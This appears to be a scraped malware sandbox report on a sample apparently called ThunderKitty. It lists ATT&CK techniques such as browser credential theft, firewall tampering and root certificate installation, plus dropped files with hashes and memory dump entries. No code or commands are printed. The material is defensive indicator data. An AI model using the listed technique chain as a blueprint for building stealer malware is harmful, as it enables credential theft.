Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

File and Directory Discovery

T1083

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PowerShell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
67b0a41134410b2b0ad5e01f6966ac1b

SHA1
fe54ad45f0ad2550513048e681ddfa2a47e25a8b

SHA256
d44434e0ea080223e4afa9ed4316cab5805e3d28221df9e8b7e2789a4518faa9

SHA512
efa1f52521bd420657ac5da046b355fc2717f372ebe2fceb4c6e70f26b5a7ec38895131f564b92def508036453669af22262b464c2abfabc664ef4594233e663

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fa683ba35bef5db77615e4281ba4c0fc

SHA1
e5d1b282d5160ccbc965b946bcbdaf27f99b0c2e

SHA256
d02a84de5459810a45b0434f93ecdb8413791c0ada1ae71210a92eed037538a6

SHA512
a181c916e3df8aefb8d458799e8aafb687007751a425bd288dfcd5de41c93529fde2dd5d6602a075e50f4f2f90886c9a2e6f7255b64325758ae5f355317a36e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3e2239307a53cbc7115fa375e0dd3a4f

SHA1
66dd1bf7a2f3ab5a34365c35456dcd73b515911f

SHA256
68f09fa9f10ee1a8f256d6630285b9f77f2713b676c3a635ceb17adae1e6e7b9

SHA512
852baecba0a8a88854a9c5042b521beb9be41cb50b6f3408cdcb6002ed99533969139a0cf30ea5965783e1460e597a293ff7a5255694f4ea3b9cd599e041378b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6939.tmp

Filesize
1KB

MD5
b576421aeeb591ef92e083e4107c7cd2

SHA1
68916921a4c6ac8651e121ceef61d076a38bb9a9

SHA256
5fc3bebbaa6525cb283bfc649795a0eb76cb8a6c9208ef1ff726501862eae6a3

SHA512
84e4643623de97ba017bbda0cd7ff010ecd6289baecdd52b11329e9613136e9e6b37965749bf9fff730066dfac5c4d863e2fd17fa809f131ac6fced8a9a1ca22

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6D31.tmp

Filesize
1KB

MD5
2a5719d526fffa4493be04c1f6793c6a

SHA1
04f8b46398851f12ccb3c2613551bc20f5dfd92f

SHA256
a213fd15ee7896aca7d6a0d94a3735f935e1375c9be763e07c214dcb8fbf8687

SHA512
df4d98b9634dd28ca8f7e6cc5e6d5707f6af3cc8a3343de96d85dcac52892b03cafe1164f2fbfd7aca4d14a0156788403ab89117842f4831ed6681091952a8a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

Filesize
72KB

MD5
ceb878cd4df4530dfe953cf2995595a0

SHA1
50c5c3f5cc26e25b7cb60d1ce6b9589682401ab4

SHA256
04ef4d1fd71a2949ac50b3887061674ae3a8e91e768d28af761feb2f857cea8f

SHA512
125a0b56ac7d1945a8d357d81ad75674b29840faecec74e3f8a5237a61871aacec3f21b1e1d2b6c34e3feb41c7a3d651b0e797ccae4f2081e3b1e31950448c78

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

Filesize
22KB

MD5
77e69a80baaf16d9fdf5e0b4cbe5f4a7

SHA1
86abfb176ddb0813b528aa04f46bdbebd537c017

SHA256
11ee7032526cc69f39bcb69f5c0d7a06353e9944d359a90ecb6ecfd1764dd042

SHA512
fa5dd78056c7ae0c4532688bf1f524ae03d2bcd88e2a2b61aad6f65e77092aca8164743a4ae402ab65c3def44560c30f0208c1d20871a4590b6f428f37371d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5h2q4e3e.leh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ocsvchmx\ocsvchmx.dll

Filesize
4KB

MD5
966648822c45b8d1cf1bc901377689a8

SHA1
059ae2f10e9e7b8c97f60b19a176a8607f84397d

SHA256
47bd62591b4d76772059670d0c70e53d495050413f92abe9106373e97f7bf38c

SHA512
6eb15a9f1b671af03e6dc9763a5e89f0577f6eb4927825a334fadd14d369035b33c015072beb9a20497deb54be9d20b7433ff958ea2e15c99459cc78e0c28cc1

Download Submit
C:\Users\Admin\AppData\Local\Temp\qtop5ekd\qtop5ekd.dll

Filesize
4KB

MD5
d83bb226a6424e633a0edfc878ca0aa1

SHA1
2b817e66741e5df1a4a016fca49f3a1c51cee033

SHA256
6b4a5b37cbce2b975eb3389b2ce6244d1db1ebd6e9f423bd77401ab4c46158d1

SHA512
f5092812f62e040b22e3bc77a1358c676557d789813ccf687db100c5a1d4adb6f44a567c0c6636bd60d3354cbf9de24706b87b8abd8805f471e6fcbf44800d81

Download Submit
C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

Filesize
2KB

MD5
9758656bbe8589c66bb241b052490c72

SHA1
b73da83fb3ae6b86c6365769a04de9845d5c602c

SHA256
e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

SHA512
da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ocsvchmx\CSC3AA5B6DA58544110B93A171C23E24E30.TMP

Filesize
652B

MD5
b9d3476adce99e7479a7caf950862a3a

SHA1
a57837a622da83f056e977309646b07c2ffa6581

SHA256
99e361e1b429443acf2bb51e8fadb45f719aa28162736dac20a9e1d4930941f6

SHA512
980f1274019962c747bbc8ea2b509269c02deeeaa55c1524f7e0082370efa673e2b36a014e19ff5ed04a868033ee2607ae9c490e4ae4171fa2b700dc6e6e07f4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ocsvchmx\ocsvchmx.cmdline

Filesize
369B

MD5
fe9dd49c506b17fa315125c8fa94f85b

SHA1
becb073aa74b100d38fc39bdf9406da0ca8f6b17

SHA256
1f08b5d6e90d29bd37147ca5513bf7c73a0858aae7c1c73b0a349397d5a9f7e5

SHA512
49bb027f6596f02515ce6634a605f3beae2e96e2634a7e9dffb6acc4e5c04b35ac628d4f2f6c82c76622830a81d08fef101485794319c0addd155e2882d49008

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qtop5ekd\CSCA217C1AF72CE478085479C8BE11A7F7C.TMP

Filesize
652B

MD5
80eb912bac25e802ee940308472f82e3

SHA1
173fd09d9b70ca0fc0138669f8b9d30cd4a541a1

SHA256
0717748dcda9cb742508a7e9e6c756f75197e6ad249c257619918e643dc9a259

SHA512
f9ccc7d1ddfd0d09f9873c10761fcb137cbd0f347884c01b7600fc532fd7fce887d9f162e98041a3b8e095fe004bb15c0335fac063095f8300e1fadf3dc26155

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qtop5ekd\qtop5ekd.0.cs

Filesize
1KB

MD5
8a1e7edb2117ec5dde9a07016905923b

SHA1
0155dbeeb16333e2eaa767b0209750efee56f47f

SHA256
c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

SHA512
4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qtop5ekd\qtop5ekd.cmdline

Filesize
369B

MD5
35b32eee9f6048eec820217b4e522c7b

SHA1
58de46d5affbbc4bee51a189745c048047fdd160

SHA256
a7d964f4e370a0df0bb122d73835be70b0b52f56b052fdd00f0aa257164ffb2f

SHA512
43ab01f752729ba4bd4ba04f64d36b791f45f61056e26c9ec2aacc52e69f2beb743f3ee85c466da8b72a88a3844a1f39957fc0f6f101b8311de9f4ea25e4b524

Download Submit
memory/2492-77-0x0000011F767E0000-0x0000011F767E8000-memory.dmp

Filesize
32KB

Download
memory/2492-144-0x00007FFC5B020000-0x00007FFC5BAE1000-memory.dmp

Filesize
10.8MB

Download
memory/2492-101-0x0000011F79250000-0x0000011F7927A000-memory.dmp

Filesize
168KB

Download
memory/2492-135-0x0000011F79230000-0x0000011F7923A000-memory.dmp

Filesize
40KB

Download
memory/2492-46-0x00007FFC5B020000-0x00007FFC5BAE1000-memory.dmp

Filesize
10.8MB

Download
memory/2492-134-0x0000011F79240000-0x0000011F79252000-memory.dmp

Filesize
72KB

Download
memory/2492-90-0x0000011F796A0000-0x0000011F79E46000-memory.dmp

Filesize
7.6MB

Download
memory/2492-45-0x00007FFC5B020000-0x00007FFC5BAE1000-memory.dmp

Filesize
10.8MB

Download
memory/2492-44-0x00007FFC5B020000-0x00007FFC5BAE1000-memory.dmp

Filesize
10.8MB

Download
memory/2492-102-0x0000011F79250000-0x0000011F79274000-memory.dmp

Filesize
144KB

Download
memory/3696-84-0x00000253E67E0000-0x00000253E67E8000-memory.dmp

Filesize
32KB

Download
memory/3696-98-0x00007FFC5B020000-0x00007FFC5BAE1000-memory.dmp

Filesize
10.8MB

Download
memory/3696-42-0x00007FFC5B020000-0x00007FFC5BAE1000-memory.dmp

Filesize
10.8MB

Download
memory/3696-23-0x00007FFC5B020000-0x00007FFC5BAE1000-memory.dmp

Filesize
10.8MB

Download
memory/3696-47-0x00007FFC5B020000-0x00007FFC5BAE1000-memory.dmp

Filesize
10.8MB

Download
memory/4556-13-0x00007FFC5B020000-0x00007FFC5BAE1000-memory.dmp

Filesize
10.8MB

Download
memory/4556-89-0x00007FFC5B020000-0x00007FFC5BAE1000-memory.dmp

Filesize
10.8MB

Download
memory/4556-11-0x000001FFED000000-0x000001FFED022000-memory.dmp

Filesize
136KB

Download
memory/4556-0-0x00007FFC5B023000-0x00007FFC5B025000-memory.dmp

Filesize
8KB

Download
memory/4556-1-0x00007FFC5B020000-0x00007FFC5BAE1000-memory.dmp

Filesize
10.8MB

Download